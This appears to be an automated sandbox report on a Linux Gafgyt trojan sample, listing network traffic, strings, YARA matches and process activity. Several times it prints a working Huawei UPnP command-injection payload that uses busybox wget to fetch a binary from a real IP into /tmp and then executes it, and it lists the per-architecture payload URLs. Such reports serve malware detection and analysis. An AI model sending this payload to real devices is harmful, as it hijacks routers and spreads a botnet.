                      Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: faBNhIKHq4.elfString found in binary or memory: http://15.235.203.214/bolonetwork.mips
                      Source: faBNhIKHq4.elfString found in binary or memory: http://15.235.203.214/bolonetwork.x86
                      Source: faBNhIKHq4.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                      Source: faBNhIKHq4.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: faBNhIKHq4.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                      System Summary

                      barindex
                      Source: faBNhIKHq4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: Process Memory Space: faBNhIKHq4.elf PID: 6220, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: Initial sampleString containing 'busybox' found: busybox
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox
                      Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolonetwork.armbolonetwork.arm5bolonetwork.arm6bolonetwork.arm7bolonetwork.mipsbolonetwork.mpslbolonetwork.x86_64bolonetwork.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                      Source: Initial sampleString containing 'busybox' found: Content-Length: abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f
                      Source: Initial samplePotential command found: GET / HTTP/1.1
                      Source: Initial samplePotential command found: GET /
                      Source: Initial samplePotential command found: GET /HEAD /POST / HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d
                      Source: Initial samplePotential command found: GET /index.php?s=/index/hink
                      Source: Initial samplePotential command found: GET /%s HTTP/1.0
                      Source: ELF static info symbol of initial sample.symtab present: no
                      Source: faBNhIKHq4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: Process Memory Space: faBNhIKHq4.elf PID: 6220, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: classification engineClassification label: mal100.troj.linELF@0/4@1/0
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/6231/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/6233/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1582/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/3088/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/230/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/110/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/231/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/111/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/232/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1579/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/112/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/233/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1699/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/113/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/234/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1335/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1698/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/114/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/235/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1334/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1576/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/2302/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/115/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/236/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/116/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/237/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/117/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/118/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/910/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/6227/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/119/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/912/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/6228/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/10/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/2307/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/11/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/918/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/12/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/13/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/14/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/15/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/16/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/17/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/18/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1594/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/120/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/121/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1349/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/122/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/243/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/123/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/2/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/124/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/3/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/4/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/125/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/126/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1344/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1465/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1586/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/127/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/6/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/248/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/128/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/249/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1463/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/800/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/9/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/801/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/20/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/21/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1900/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/22/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/23/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/24/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/25/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/26/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/27/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/28/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/29/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/491/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/250/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/130/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/251/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/252/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/132/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/253/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/254/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/255/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/256/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1599/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/257/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1477/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/379/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/258/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1476/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/259/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1475/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/936/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/30/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/2208/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/35/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1809/cmdlineJump to behavior
                      Source: /tmp/faBNhIKHq4.elf (PID: 6225)File opened: /proc/1494/cmdlineJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36734 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48860 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33462 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45112 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40788 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48734 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54222 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42510 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53130 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41094 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59050 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34536 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36278 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52728 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56886 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44014 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58196 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44052 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47794 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44040 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38000 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38628 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43126 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37348 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59124 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47982 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32888 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52450 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40150 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57708 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37826 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41818 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43680 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35138 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44458 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42574 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56366 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57502 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55506 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47684 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47728 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56808 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43520 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50602 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36746 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53230 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47604 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51880 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36512 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46562 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41354 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43440 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34472 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57796 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57480 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34808 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36788 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34718 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39796 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54738 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52740 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34142 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47332 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60150 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34110 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58602 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49446 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36772 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41330 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55928 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45724 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34728 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48848 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57354 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54846 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47596 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57272 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48566 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35682 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39450 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36944 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41502 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41362 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53678 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39770 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38876 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58430 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48288 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36372 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41118 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54188 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55958 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57388 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43798 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46898 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41670 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34960 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53936 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60736 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56102 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37146 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44752 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33260 -> 8081
